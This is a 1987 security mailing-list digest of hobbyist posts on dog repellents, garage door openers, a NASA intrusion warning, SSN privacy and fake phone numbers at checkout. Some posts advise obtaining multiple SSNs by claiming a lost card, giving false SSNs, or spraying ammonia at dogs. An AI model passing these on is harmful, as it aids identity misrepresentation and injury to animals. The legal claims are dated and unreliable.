To: RMOREY%ATLAS%rca.com@relay.cs.net
Subj: [1496] Re: Dogs, defense against

From: RMOREY%ATLAS%rca.com@relay.cs.net
Date: Fri, 31 Jul 87 11:03 EST
Subject: Dogs, defense against

I have heard about aerosol sprays that deter attackers, but can't find them and don't know if they are legal. Someone suggested to my wife that she buy a squirt gun with a 30-foot range and fill it with ammonia to shoot at dogs.

Q: Would this work without getting me into a lawsuit from seriously injuring a dog?
Ammonia? Sounds pretty nasty, and I would think it could hurt the dog. I've always heard lemon juice is what you should use.

And what is in aerosol sprays that are used for self defense, if not mace? What sprays are legal and where are they found?

Well, there is "PARALYZER", which is basically Army tear gas. It comes in a small black aerosol; most "army surplus" type stores sell them, among other places. I'm not sure what a dog would do if you sprayed him with it though; the stuff is NASTY.

I'm not a dog hater. I've never been a dog owner, either. Does anyone have any better suggestions?

Most of the postal carriers here have some sort of small aerosol clipped to their mail bags; I assume it is for discouraging dogs. You might call your local post office and ask them what they recommend.

--Dave Curry

From: Carl DeFranco 31-Aug-1987 09:30:52
To: rmorey%atlas%rca.com@relay.cs.net, security@RUTGERS.EDU
Subj: [1674] Personal protection from Dogs

I'm assuming this is related to the net. R. Morey inquired about things to protect people from less than friendly dogs. There are a number of such products available, tho' I'm not sure of the sources.

1. STOP! is an aerosol designed for protection specifically from dogs. Aimed at their snouts, it will stop them in their tracks without doing permanent harm. A bicycling friend of mine swears by it.

2. DAZER is a new electronic device that generates high frequency sound painful to dogs. A recent Syracuse, NY newspaper article described tests as ambiguous - when it worked it worked very well.

3. The originally mentioned ammonia squirt gun trick is very effective if you can hit the dog.

Regarding liability for hurting dogs: I'm not a lawyer, but in nearly every community, some form of leash laws exist. Even when they don't, a pet owner is responsible for his/her pet's actions.
If they leave the confines of the owner's property, you are justified in using reasonable means, including physical harm if truly necessary, to protect the health and safety of yourself and your family. I personally wouldn't hesitate to take action against a dangerous animal if it threatened me, my wife, or my children. I would also be glad to answer any pet owner's complaints about my treatment of their animal.

By the way, I have a large dog and two cats of my own - I'm NOT an animal hater.

Carl DeFranco
DEFRANCO@RADC-TOPS20.ARPA

From: mason@oberon.lcs.mit.edu (Nark Mason) 31-Aug-1987 15:44:09
To: RMOREY%ATLAS%rca.com@relay.cs.net, SECURITY-REQUEST@RUTGERS.EDU
Subj: [1095] Re: Dogs, defense against

There are two kinds of spray dog repellents I know of: one's mace (CN or CS gas) and the other's just something nasty billed as a dog repellent. Generally either one will repel an attacker, man or dog. But if you run into a really mean dog or really mean (or drugged) human it will just make them mad.

I've spent a lot of time biking in the mountains in western Mass and NY and have had problems with dogs. I got a can of mace (CN I think, it was illegal - tear gas); next dog I ran into I leveled the can at him and he ran for cover before I had a chance to douse him. I haven't carried a can since; all the dogs I've run into KNOW, they've been maced before. Unless the dogs are an extra ornery junkyard type, mace, CS, CN or dog repellent will teach them quickly to stay away. (Good luck finding the stuff, I believe it's illegal many places - my grandmother got some from her mailman once [for use on dogs].)

From: 14-Sep-1987 11:23:43
To: SECURITY@RED.RUTGERS.EDU
Subj: [1928] Hackers - NASA - Warning

You have probably already seen this, but just in case...

Selden E. Ball, Jr.
(Wilson Lab's network and system manager)

Cornell University                NYNEX: +1-607-255-0688
Laboratory of Nuclear Studies     BITNET: SYSTEM@CRNLNS
Wilson Synchrotron Lab            ARPA: SYSTEM%CRNLNS.BITNET@WISCVM.WISC.EDU
Judd Falls & Dryden Road          HEPnet/SPAN:
Ithaca, NY, USA 14853             LNS61::SYSTEM = 44283::SYSTEM (node 43.251)

---------------------------------------

From: Jnet%"C0033001@DBSTU1" 14-SEP-1987 08:17
To: SYSTEM
Subj: Hackers - NASA - Warning

From: Helmut Woehlbier +49 531 391 5513
Subject: Hackers - NASA - Warning

I'm the technical representative (networking) of Braunschweig University, Germany, and I forward the following lines of my friend who is working for the German news agency (dpa).

Kind regards, freundliche Gruesse
Helmut Woehlbier

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

German hackers have successfully attacked the NASA and will reveal that tomorrow (Tuesday, Sept. 15) in the German news magazine 'Panorama', which will usually be seen by 10 - 12 million people. Newspaper articles by dpa (German news agency) will appear simultaneously.

Hackers wonder why the doors of NASA are still wide open. In his "important message" Roy Omond (DHDEMBL5) speaks of a magical password. Perhaps it is the same still now. This is the third warning to the NASA (the first two were sent via SPAN-net). I wonder why the NASA neither answers nor reacts.

Other systems are also open, because they implemented the Trojan Horse via their backups after having installed the mandatory update by DEC to patch the former security hole.

signed Jochen Sperber

From: GREENY 17-Aug-1987 10:49:48
To:
Subj: [1250] re: Garage Door Openers

>A friend of mine has a two car / two door garage. He wants to install
>a remote control garage door opener on both doors with different frequencies
>for each door. He would also like ONE controller ...

Seems simple enough to me. The crystals in those handy-dandy garage door openers are *usually* (if they aren't...just de-solder em..)
plugged into a socket somewhere in the controller. Just mount the two crystals somewhere else and wire them thru a DPDT (Double Pole Double Throw) switch from Radio Shack and wire the switch into the now empty socket from the crystals. Stick it in the car with some double stick mounting tape, and label the switch Left/Right or 1/2 or 0/1 (whatever suits your fancy...) and then hit the button. When it's on "1" door "1" opens, and when on "0", door "0" opens....no biggie.

And if there is such an "off the shelf" (i.e. Unhackerish) type available, it probably is part of a so-called "system" and costs giga-bucks!...

Hope this helps....

bye for now but not for long....

Greeny
Bitnet: miss026@ecncdc
Internet: miss026%ecncdc.bitnet@wiscvm.wisc.edu

From: Joe Harrington 17-Aug-1987 22:22:51
To: security@red.rutgers.edu
Subj: [906] ssn's

MIT, in a noncharacteristic burst of liberal generosity (or they're tired of getting kicked in the *** by people who demand their rights), gives you the option of having your ssn or a pseudo ssn which they provide as your MIT ID number. The pseudo ssn's all begin with 888, as (so goes the story) there have not (yet) been any real ssn's issued with that prefix. If it is true that no 888 numbers have been issued (please reply if you think otherwise and have counterexamples), then giving some random 888 number as your ssn could be an easy solution for people who wanted to hide theirs and avoid hassle (though be careful about misrepresenting yourself on signed legal documents). Unfortunately, it is too late for me, as my ssn is plastered all over everything.

Oh well,
--jh--

From: "Mike @ (214)575-3517" 18-Aug-1987 12:27:21
To: security@RUTGERS.EDU
Subj: [824] re: garage door openers

Sure, you can do that .. but not by changing the frequencies. Some of the new garage door openers send a digital code (typically 8 bits) as part of their signal. The door opener and the controller have to be set to the same code for it to work.
All you need is two openers (same brand and model) and one controller. To change codes on my controller, there are some jumper cables that you cut to set the bits. Wire a switch up to one of the jumper cables. Set the codes in the door openers so they only differ by one bit (the one with the switch). Now the switch allows you to send two different codes, one for each door.

Enjoy,
Mike Linnig, Texas Instruments

From: John Pershing 31-Aug-1987 09:56:35
To: security@RUTGERS.EDU
Subj: [727]

There used to be a product called "Halt!", sold at bicycle stores, that was *quite* effective at stopping charging dogs in their tracks. However, I have no idea what would happen when it wears off, as I was always long gone by that time -- maybe you would simply have a very angry dog on your hands... Halt! is more-or-less aerosol Tabasco Sauce, and does not cause any harm to the dog; ammonia, on the other hand, can cause blindness if you get it in the dog's eyes. I don't know if Halt! is still available, but I assume that it is -- check out your local bike shop.

John A. Pershing Jr.

From: Simson L. Garfinkel 31-Aug-1987 14:04:19
To: Security@red.rutgers.edu
Subj: [2410] Mail

(I saw this on somebody's desk today. It is on official stationery.)

NATIONAL SECURITY AGENCY
Fort George G. Meade, Maryland, 20755-6000

Serial: V1-072/L-87
24 July 1987

Dear Gentlemen and Ladies:

The National Security Agency, in conjunction with four major U. S. Corporations, is currently developing a new family of secure telephones. These new phones, designated STU-III, will begin fielding in October 1987, and will serve as the primary secure telephone for the U. S. Government and its contractors. In support of this program, the National Security Agency will host a "STU-III Seminar for U. S. Contractor Personnel" on 5-8 October 1987 at the Aladdin Hotel, Las Vegas, Nevada. The purpose of this seminar is to furnish the U. S.
contractor community with essential information on the STU-III family of secure telephones, and to provide a forum for discussing STU-III issues of mutual interest. This meeting is the only one of its type planned for the contractor community in the foreseeable future. If your company plans to acquire STU-III terminals, appropriate personnel should attend.

...

Highlights from agenda:

Tuesday, 6 October 1987:
    STU-III overview and Program status
    STU-III Implementation Schedule and Field Plans
    STU-III Testing (Progress report and future plans)
    STU-III Vendor Presentations
        AT&T
        Motorola
        RCA

Wednesday, 7 October 1987
    STU-III Key Management System Overview
    STU-III Terminal Keying procedures
    Vendor Keying Demonstrations
    STU-III Doctrine
    Contractor STU-III Key Management Structure
    Command Authority/User Representative/COMSEC Custodian Relationships

Thursday, 8 October 1987
    STU-III Key Ordering and Distribution
    Accounting for STU-III Key
    Key Management System Milestones and Schedule

....

A security clearance is not required for attendance at this seminar. However, attendance will be limited to U. S. Citizens only, and the attached registration form must be signed by each attendee. The name and phone number of a company security officer should also be provided, so that U. S. citizenship may be verified.

Further information concerning the seminar may be obtained from Mrs. Linda Amrein, Miss Maureen Anderson, or Mr. Bill Johnston on (301) 688-7897/8255.

From: James M Galvin 31-Aug-1987 14:38:55
To: security@RUTGERS.EDU
Subj: [660] giving out phone numbers

Hmmm, watching all the discussion about social security numbers, I am curious about two things in regards to phone numbers. When I use my credit card, retailers invariably ask for a phone number under your signature, and worse, insist on it. Generally I just give them a random number. (I even used 999-123-4567 once, and nobody noticed.)

First, can a retailer insist on a phone number?
Second, am I in trouble for giving out wrong numbers?

And just to go a step further, what about when they ask for your address?

Jim

From: mason@oberon.lcs.mit.edu (Nark Mason) 1-Sep-1987 09:09:00
To: security@RUTGERS.EDU
Subj: SS #'s

There's been a lot of talk about how not to give out your SS #; the one thing I still fail to understand is why not give out your SS #? How can it be abused?

From: "Bryan, Jerry" 1-Sep-1987 14:40:51
To:
Subj: SS# & Utilities -- a story

>To the best of my recollection, the last time I renewed my California
>driver's license, I was told my SS# was required. I asked for confirmation,
>saying it was my understanding that it could not be required by law, but
>they were adamant, so I did not pursue the issue even to the point of
>asking to talk to a supervisor.
> Jeff Rothenberg
> The RAND Corp.
> jeff@rand.org

My understanding is that in about 1979 or so, Congress made an explicit exception to the Privacy Act of 1974 to explicitly permit states to use SSN's for all forms of motor vehicle registration, including both your driver's license and the registration of your car. This means, of course, that the original Privacy Act really does not mean anything any more because your driver's licence is such a ubiquitous ID that once there, it is available to all the world.

From: "Bryan, Jerry" 1-Sep-1987 14:53:04
To:
Subj: SS# and Utilities

>One of my biggest frustrations is interest bearing bank accounts. The IRS
>requires you to give the bank your SS#, but as far as I know there are
>no restrictions on what they can do with it. Does anyone have a solution
>for this?

Write your congressman. Existing law is *not* on your side. I fear I am cynical, but I have lost several times -- after fighting hard and even hiring lawyers. Present law favors, encourages, and often requires the use and disclosure of SSN's. The somewhat limited provisions restricting SSN's that were present in the Privacy Act of 1974 have been emasculated by subsequent legislation.
From: 1-Sep-1987 17:03:33
To: security@red.rutgers.edu
Subj: Social Security Numbers

From: Scott Dennis, Computer Support
Subject: Social Security Numbers

In Alaska, they appear to have a more enlightened approach to Social Security numbers. When I renewed my driver's license a couple of years back, I told them to remove it. The clerk didn't know how to do it, but the supervisor was very helpful. My license now shows 000-00-0000 in the SS # location.

My other experience with this was at Arizona State University, where they use it for a student ID number. I refused to give it, and they were happy to issue me a 998-xx-xxxx number. Their forms call it a 'student ID #'. The University of Alaska is pretty insistent on getting the actual number, however. Their forms have the gall to always call it a 'SS #'.

From: David Lyle 2-Sep-1987 11:35:20
To:
Subj: Social Security Numbers

According to Social Security Administration Publication No. 05-10001 (Sept 86):

DISCLOSING YOUR SOCIAL SECURITY NUMBER

"Any Federal, State or local agency that asks for your Social Security number must tell you whether giving it is mandatory or voluntary, under what authority the number is being requested, and what uses will be made of it.

Some non-governmental organizations also use Social Security numbers for recordkeeping purposes. Such use is neither required nor prohibited by Federal law. Although you are not required to give your number, the organization is not required to provide you service if you do not. Knowing your number does not allow these organizations to get information from your Social Security record."

--David Lyle
--Univ. of Ill. Foundation

From: Don_Lewine@SDD.CEO.DG.COM 10-Sep-1987 17:43:25
To: SECURITY@RED.RUTGERS.EDU
Subj: Social Security Numbers

There is no law against getting several SS#s. I have several. I keep one for the IRS and use the others for driver's licenses, credit, education, and so on. Because they are "my" SS#s, I know that no one else is using them.

P.S.
The way one gets multiple numbers is by going into the SS office and saying you lost (or never had) your number.

From: Simson L. Garfinkel 11-Sep-1987 15:48:48
To: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net
Subj: SS Abuse
Cc: security@RUTGERS.EDU

TWIMC:

It's beginning to appear that my master's project at Columbia will be on abuse of social security numbers. Here's my first story:

John Stein (not his real name) teaches writing and performs technical consulting at Columbia University. He is married, has two children, a house in New Jersey, and a six-figure income.

Two years ago, John and his wife went to Hawaii for his semester-long sabbatical. Because of his income, John is required by law to file estimated income tax payments every semester. Naturally, John filed these payments from Hawaii.

When he returned to New Jersey, he found that some of his mail had not been forwarded while he was on vacation. Among these was a notice from the IRS saying that they had not received his estimated tax payments and that a lien had been placed on his house for the overdue taxes.

Now, by this point John had the canceled checks. It took over two months of working with the IRS to find out what had happened: The taxes had been mailed from Hawaii, and the Post Office had delivered the checks to the IRS's branch office in California rather than in New York. This was the year that the IRS had all of its computer screw-up problems, so the tapes from California were never run against the tapes from New York, and the credit was never picked up. Once this was all traced down, the IRS removed the lien on the house.

Nothing happens for two years, until John applies for a loan and has it rejected by the bank because he is a credit risk. Apparently, in the TRW credit database, which is indexed by SSN, there is a statement saying "123-45-6789 (not his real SSN): Lien removed from house." The bank would not give a loan to somebody who had a lien on his house.
John contacted the bank, provided documentation from the IRS that the lien had been placed in error, and eventually, after a lot of hassle, got his loan approved.

The next year, when he tried to get a Sears Discovery card, the same thing happened again. This time, he sent a copy of all the documentation to the TRW credit database, asking them to remove the "lien removed" statement from their records. They didn't. Instead, they added to their records that the lien had been issued by the IRS, and that the IRS later said that the lien had been issued in error.

Rather than face continued hassles, John has decided to work with his current bank for all future credit transactions. Unfortunately, he has to do this for the rest of his life.

================================================================

If anybody has a story, please send it to me. I'm collecting them. Please also send me your phone number and tell me if you would mind being interviewed for this project. Thank you.

From: Kevin M. Leahy 11-Sep-1987 21:48:52
To: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net, security@RUTGERS.EDU
Subj: RE: SS# & Utilities -- a story
Cc: LEAHYKM@a.isi.edu

I am certainly the most naive on this discussion group. What is the big deal about giving out your SSN?? Has anyone actually been harmed by giving out the number? I sense that there is really something that I am missing, but this won't be the first time. I'm sorry, but I really can't get worked up over giving out 9 numbers which represent who I am no less than my signature (when legible) does. Is this a practical point or a philosophical one?

Wondering,
Kevin (SSN withheld pending enlightenment.)

Kevin Leahy
LEAHYKM@A.ISI.EDU

From: Brint Cooper 12-Sep-1987 04:45:25
To: Security@RUTGERS.EDU
Subj: Re: SS and the data thieves...

During this discussion, many folks have asserted that, under federal law, no one may require your SSN except for very specific purposes such as taxation. I wonder if this is true?
To my knowledge, the Privacy Act applies only to the Federal Government and to contractors operating on its behalf. Is this not true? I don't believe it is illegal for a university to use a student's SSN as his/her student id. Can someone provide an authoritative statement on this?

_Brint

From: Mary Akers 1-Sep-1987 10:38:49
To: Security@RUTGERS.EDU
Subj: [5604] Social security # - a different viewpoint

I received this over the net from a friend. I thought it would make an interesting counterpoint to the recent discussion on releasing Social Security Numbers - note the section about using false numbers.

------------------------------------------------------------------------
Date: Tue, 11 Aug 87 19:00:24 edt
From: decvax!LOCAL!minow@decwrl.dec.com (Martin Minow)
To: decwrl!risks@csl.sri.com
Subject: [Found on Usenet (net.consumers)] Social Security Administration -- Inside Scoop

From: lance@ubvax.UUCP (Lance Keigwin)

Just after college I accepted a job with the Social Security Admin (SSA) in a NYC district office. I spent several years with SSA as a claims representative, operations supervisor, and regional program specialist. Fortunately I had the good sense to leave several years ago, when it became very clear that federal service was not an alternative to anything.

In these jobs I dealt with all levels of the SS program. Undoubtedly the two biggest headaches for SSA (and the public claimants) were resolving discrepancies in dates of birth and earnings records. Screwups in establishing age are another story, and far less controversial. SSA's record there is really pretty good, if the claims rep is not a dope. But scrambled earnings records are almost impossible to fix. This usually happens when somehow an employer gets a hold of a wrong number, usually from an employee (although the employer could pick it up from almost anywhere...and they do!).
Of course there is cross-checking against what SSA believes is the right name and number, but all it takes is some (#$%@$%) clerk to cross-refer two numbers to the same person and zap! Suddenly your record reflects someone else's wages too. Or worse: your covered earnings are credited to some third party. This happens all the time because people forget their numbers, re-apply for a second one, guess wrong, etc. Safeguards exist but if you consider the scale here (all those workers, all those employers, and the general interest of the average gov't employee in doing the job right even if it means more work and worsened processing statistics) there are bound to be major problems.

When does the error come to light to you, John Q. Public? If at all, almost always at retirement, some decades in the future; at a time when many employer records are gone, if not the employer itself, and your recollection is at best fuzzy. Chances are probably 9 in 10 that you'll never get credit for all the taxes you paid, if your record is messed up obviously enough for a rep to notice it and to look into it.

My advice:

1) Never, NEVER give anyone a fake SSN. It will haunt you later in life. If SSA has to search for earnings under a different number (spotted on an application for employment, a credit card report, school record, etc.) you will suffer significant delays in getting your correct benefit at best. More likely, you will never live to see the tax credit.

2) Always, ALWAYS request a statement of your earnings every three years. There are screwy statute of limitations regulations (3 years, 3 months and 15 days), about when an error can be corrected. Also the statement of earnings you get will only break out the last several years individually, and will total all prior years in one lump sum, so it is good to do it periodically.

3) If you suspect an error, ask for a complete posting of each year (a "certified earnings record").
If you're given a little card to complete and told it will be mailed to you, don't buy it! You can only get a complete record by seeing a Service or Claims representative, who must complete an SSA-450 for transmission to HQ in Baltimore. Insist on a photocopy of it when it arrives. Be troublesome, if necessary.

4) If you do see an error, put your dispute in writing and if you must mail it in, do so certified mail. Establishing the date you first suspected an error is important. SSA has ways of "scouting" an employer's records. Ask to have it done.

5) Check your W-2 for the correct SSN. Paystubs too, but especially the W-2. Report any error to your employer and IRS.

6) If you don't want to give your correct SSN to someone and feel you must fake it, give them a number that starts with "9". There is no such thing as a real 900-series number so you are not risking screwing up yours or someone else's account. SSA will never accept it.

7) If you get an official decision that goes against you, protest if you really believe you're being cheated. There are several appellate steps, and usually the official who decides is reasonably intelligent and responsible. Read the back of the notice about "reconsiderations", "hearings", etc. The reversal rate is very high.

As a matter of interest, two years after I started work for SSA I requested a record of my earnings. Sure enough, there was an error in two quarters. Want to guess who the employer was that messed up? Yep, SSA. It took them 3 years to fix it. Good thing I had an "in". :-)

I also discovered that my retired father should have been getting benefits for three of his student children (an SSA snafu). I had us apply, and asked for full retroactivity (over 8 years). The claims examiner awarded only 12 months of retroactivity. I appealed. We won. Total family benefits came to over $7000. I used my $1500 to buy a washer and dryer.

Lance P. Keigwin (lance@ubvax.UUCP)
(408)496-0111 (operator) 562-7738 (direct)

From: paul@uxc.cso.uiuc.edu (Paul Pomes - The Wonder Llama) 4-Sep-1987 16:55:46
To: security@RUTGERS.EDU
Subj: [524] Telephone tapping via the isolation box

It occurred to me, while watching the telco man install my data line, that the network isolation box provides very easy access to a line tapper. A line-powered FM transmitter with an RJ11 plug and socket at each end would take less than two minutes to install start to finish. These thoughts have prompted me to install a locked cover over the box.

-pbp

From: ORG5NMC@cms1.ucs.leeds.ac.uk 7-Sep-1987 13:59:16
To: security@RUTGERS.EDU
Subj: [766]

Hello all,

While talking to the cleaner of my office she showed me the master key to the floor on which I work. I examined it and found very little similarity between this master key and my own. It strikes me that most of the metal that my key is composed of is only there to stop me opening other doors rather than to allow me to open my own! Does this mean that the key to my door is very much more simple than it looks? Does anybody know on what general principles these types of system are built? Are these systems safe (it seems to me that taking a file to my key would allow it to open other doors!) enough?

Neill.

From: "Jerry Leichter" 10-Sep-1987 01:15:45
To: risks@csl.sri.com, security@RUTGERS.EDU
Subj: [4550] DES and the criminal world

Drugs and DES: A New Connection
From "Logged On", by Vin McLellan - Digital Review, August 24, 1987, page 87

Anthony Prince Fairchild is doubtless a colorful rogue. Five years ago, when People magazine reported on a dispute between the Aspen sheriff and the Drug Enforcement Administration (DEA) about lax law enforcement in the Colorado resort town, Fairchild stepped forth - not to deny the DEA's allegations that he was running an Aspen "drug factory," but, rather, to defend eccentricity.

"It's not against the law to be bizarre," he told People, which featured a photograph of him leaning back against a nude female mannequin he called Christina.

Some may have found Fairchild's face familiar. An engineer by education and trade, Fairchild had also been a model: His Salem-smoking visage has adorned millions of magazines and billboards. He's now 50 years old, but police still call him a "pretty boy."

Last month at a pre-trial hearing in San Jose, Calif., Fairchild curled up on a courthouse bench reading Firestarter, while the curious strolled by to check him out. After all, Fairchild had just had his bail changed from $2.5 million to "no bail" out of fear that he would post the money and disappear. "He looks just like Timothy Leary," said an onlooker, referring to the LSD guru of the '60s.

If Fairchild isn't a legend like Leary, it may be because federal authorities have never publicized the extent of their interest in him, even though they've sought him several times over the years. But after being arrested last November with eight kilos of cocaine, $12,000 in counterfeit money and 85 pounds of high explosives, Fairchild became a topic of rumor in Silicon Valley, in the California drug culture and, oddly enough, among the nation's top security consultants as well.

"The guy's got a brain," remarked one California investigator. "You maybe couldn't guess it to see the mess he's in, but he's done a lot of things - legit things - and some say he's just slightly short of being absolutely brilliant."

Fairchild's resume indicates success in a half-dozen careers, most recently as an EDP consultant in Silicon Valley. It claims he holds 11 U.S. patents, and states that he was one of the authors of Digital Research's Concurrent PC-DOS. The police say this work record is accurate.

Predictably, Silicon Valley police have been among the first to confront the problem of criminal enterprises that digitally encrypt incriminating records.

"There's one case like that every six weeks around here," noted a local police reporter. "It's become quite common."

The method of choice is, of course, the Digital Encryption Standard (DES), the cipher approved by the U.S. government for commercial data security. Fairchild used a Winterhalter DES board in a DOS micro to keep what police believe to be an extensive diary of the affairs of a "large international drug ring."

Local, state and federal narcotics agents are all very eager to gain access to Fairchild's records. Indeed, Santa Clara, Calif., police reportedly used covert FBI funds to have a privately owned supercomputer grind away at cracking the DES-encrypted data. The attempt was not a big secret. Several EDP security consultants were asked to suggest crypto attacks.

What made the DES attack feasible, if still unlikely to succeed, was that the Winterhalter device uses a program to transform a 6-to-16-character password into the 64-bit DES key. The cops got lucky: With a pass through a full English dictionary, and by culling significant names and such from Fairchild's personal history, they were apparently able to guess three of four passwords that were used to encrypt files stored on his micro. The passwords were all eight or fewer characters in length, and all in lowercase letters.

The diary file continued to elude their efforts, but the police reasoned that if the DES password for the diary was less than eight characters, a "brute force" approach to finding it was possible. A cryptanalyst who is a leading consultant for California banks was hired to make the attempt.

The supercomputer may have actually been chewing away when the Justice Department stepped in late last month to confiscate copies of the encrypted diary, presumably as evidence in a federal drug case against Fairchild. This pre-empted local authorities from possibly making the big score.
From: 12-Sep-1987 16:33:57
To: security@red.rutgers.edu
Subj: [1438] Garage door openers, etc

I have seen garage door openers made for two doors, for split 2-door garages. I do not, however, think this is the forum to discuss them in.

We have had a security breach here, on our VAX 8800, which is related to Social Security Numbers. We use the SS # as an account ID, and as the initial password for users. No, this was NOT my decision, and I do not like the concept, but I do like working here, so that's enough about that.

We had a user using the WHO program who was looking up random SS #s until he found a hit, then he tried it to see if it was the password to the account. This wouldn't be so bad, since the system forces first-time users to change their passwords, except that this is the beginning of the academic year and there are a lot of new accounts around which haven't been logged on to. Needless to say, he caused a lot of trouble by sending troublesome mail messages to users, and generally wreaking havoc.

Our response has been to disable each account he uses, one by one, but since he appears to be a dialup user in another city (our network spans 1100 by 1400 miles), there is not a whole lot we can do to him. We did correct the backdoor in WHO, though, so as to prevent another occurrence of this type.

Just one more reason to stay away from using SS #s!

From: 12-Sep-1987 16:35:11
To: security@red.rutgers.edu
Subj: [935] SS#

Social Security numbers are a very volatile subject. I think the subject has been covered well in this digest. Most government agencies withhold their policy on SS #s simply because it is much more convenient for them when people provide them. There are very few government agencies which absolutely require that you disclose your number, however. Private companies are a different matter, however. They can refuse service if you don't meet their requirements, whatever they may be. As for changing all of this, it probably is too late in the game.
Those of us who feel strongly enough to protest will be noticed, but face it, the average person is going to take the path of least resistance. There will always be more than enough people who quietly go along with it to offset those of us who resist.

From: Don Chiasson 14-Sep-1987 17:55:13
To: security@RUTGERS.EDU
Subj: [442] Codebreaking article

Spectrum, the magazine of the IEEE (Institute of Electrical and Electronics Engineers), is doing a series of articles on Electrotechnology in World War II. The September 1987 issue has an article "Breaking the Enemy's Code" (pp. 47-51). Nothing drastically new in it, but it is interesting.

Don

From: *Hobbit* 30-Sep-1987 17:19:13
To: Security-digest: ;
Subj: [12419] Summary of msgs concerning: giving out phone numbers

These are being sent as a digest to save some time and network bandwidth. Also, some of these messages are from a time when the inet newsgroup "misc.security" was erroneously configured as an unmoderated group, which is why there's a lot of query/response going on before the messages ever made it to the "real" list. [This problem has been fixed...]

_H*

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: 1 Sep 87 00:10 PDT
From: William Daul / McDonnell-Douglas / APD-ASD
Subject: Re: giving out your phone number

For what it is worth, when asked for my phone number on charges or checks, I usually give some random phone number (with a valid prefix). I know my credit is good and there is no reason for them to know my phone number.

--Bi//

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 1 Sep 87 8:27:05 EDT
From: Dennis G Rears (FSAC)
Subject: Re: giving out your phone number

I don't know if they can force you to give your phone number or for that matter your address, but how can they verify it? Whenever I am asked to give them my phone number or address I give them an address in a fake town (Tulga, Fl) and a fake phone number (813-622-1212) which happens to be the number for time. It's easier to lie about it than argue with the clerk.
I believe though they can refuse to let you use your credit card without it. Just like they do not have to take checks.

An interesting idea though is stores' refusal to take 50 and 100 bills. I went to McDonald's the other day and tried to pay with a $50 bill but they demanded identification. I refused, said to them "take it or give me the food for free". They still refused, I took the food and sat down to eat. The manager came and said he would call the police if I did not pay for the food; I said, I offered to pay and you refused to take it. After I pointed out that a $50 bill is legal tender and it is against the law to refuse to take it he finally relented and allowed the cashier to take the money.

Dennis

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Wed, 2 Sep 87 10:54 CDT
From: "Mike @ (214)575-3517"
Subject: RE: ss#

In a similar vein... EVERY time I buy something at Radio Shack they want to know my address. I really don't mind them knowing it I guess, but it sure wastes my time so I usually refuse. I've gotten into a heated argument over this with the sales person (sometimes they claim that they need it to validate the warranty). I still refuse. It seems that they are scored on the percent of addresses they get. If they get less than 90% they get fired.

Mike

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

From: "J Scott Goldberg @eldest"
Date: Wed, 2 Sep 87 17:36:24 PDT
Subject: Re: giving out your phone number

I've found a way of handling requests for my fone number that works pretty well - I just give out my work number. (In fact, many merchants will choose a daytime number given the choice!) I developed this approach first in terms of my address, as I've had a P.O. box since those college days of frequent apartment changes. When a merchant "simply must" have a street address, I offer some positive statement ("I'll be happy to give you my work address - ...") that satisfies their need before it gets to the otherwise seemingly inevitable refusal confrontation.
thnx
J Scott Goldberg                              TeleSoft
{sdcsvax,hp-sdd,scubed}!telesoft!jgoldberg    5959 Cornerstone Court West
telesoft!jgoldberg@sdcsvax.ucsd.edu           San Diego, CA 92121

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Wed, 2 Sep 87 23:59:41 EDT
From: WALLACE%UMDB.BITNET@wiscvm.wisc.edu
Subject: giving out your phone number

Working in a retail store, I do know that we were instructed to get a person's phone number on the charge slip. *IF* the customer does not give you *A* phone number, you must void the sale, or use another payment method. This was the rule for a very large family drug store.

Wallace@UMDB

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Tue, 1 Sep 87 17:05:22 EDT
From: Steven_J._Gold@um.cc.umich.edu
Subject: giving out your phone number

"When you use a credit card, store clerks always ask you to sign the receipt and write down your phone number. ... can they force you to give out your phone number?"

This is a very stupid practice which seems to occur only in the USA -- I've never been asked for my phone number on a charge slip in Canada or Europe. What makes it "stupid" is the false sense of security the merchant gets from a string of digits when no attempt is made to validate the information!

Since some merchants "require" a phone number, I give them one: a local computer access number! Of course, I could give them anything -- an IRS office, the White House number, or a purely random string. They would accept it, gladly, and I know they would never call it.

So, can "they" force you to give out your phone number? NO! They can only force you to give them a string of digits which may or may not be your number.

SGold@um.cc.umich.edu

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Fri, 4 Sep 87 15:32:46 CDT
From: paul@uxc.cso.uiuc.edu (Paul Pomes - The Wonder Llama)
Subject: Re: giving out your phone number

Restaurants almost always request your phone number when paying a meal check with a credit card.
The single biggest use they have for it is calling customers who forget to pick up their cards when they leave. My solution is to put the card away, THEN sign the form.

-pbp

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Subject: Re: SS and the data thieves...
Date: Fri, 11 Sep 87 08:49:05 -0700
From: kent@decwrl.dec.com

They don't check this number as part of verification. In restaurants, it's not even requested until you're signing the slip and leaving. I wonder what they do with this info. It might help someone who's fraudulently using your credit card number. It might also be sold to telemarketing firms.

Again, why not submit a false one? I regularly leave my work phone or a string of seven random digits (sometimes I mentally spaz and leave my phone number from two years and 2000 miles away...).

I used to get the story that this number was requested to handle cases where the purchase was under the floor limit, so if something later went wrong with the charge (when they finally got around to entering it), they could get in touch with you. However, everyone (at least in the SF Bay Area) now routinely has magstripe readers attached to phone lines, and they all seem to get phone approvals on every purchase, so I don't know why the hell they still want my phone number.

Sometimes I get ornery and say I don't have one, or that it's unlisted, and this causes them utter confusion. Great fun, if you're in the right frame of mind. I think it's just force of habit these days, combined with a submissive public.

Cheers,
chris

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Date: Fri, 11 Sep 87 10:31:11 EDT
From: Simson L. Garfinkel
Subject: Re: SS and the data thieves...

I started giving false names and phone numbers at Radio Shack when I was 10. I didn't know why they were asking my name and address and phone numbers on *cash* purchases.
My theory was that if I gave them a lot of different addresses, and they sent their catalog to each address, it would cost them a lot of money and eventually they would give up. Hasn't happened so far.

Once, I told the clerk that my phone number was "555-1212." Didn't seem to faze him, though.

To my knowledge, the only time that you are required to give your SSN is for tax purposes (bank, job, financial aid, &c). I don't know if you can be arrested for fraud if you give a false SSN but don't sign a form saying that you've given a false SSN.

................................................................simson

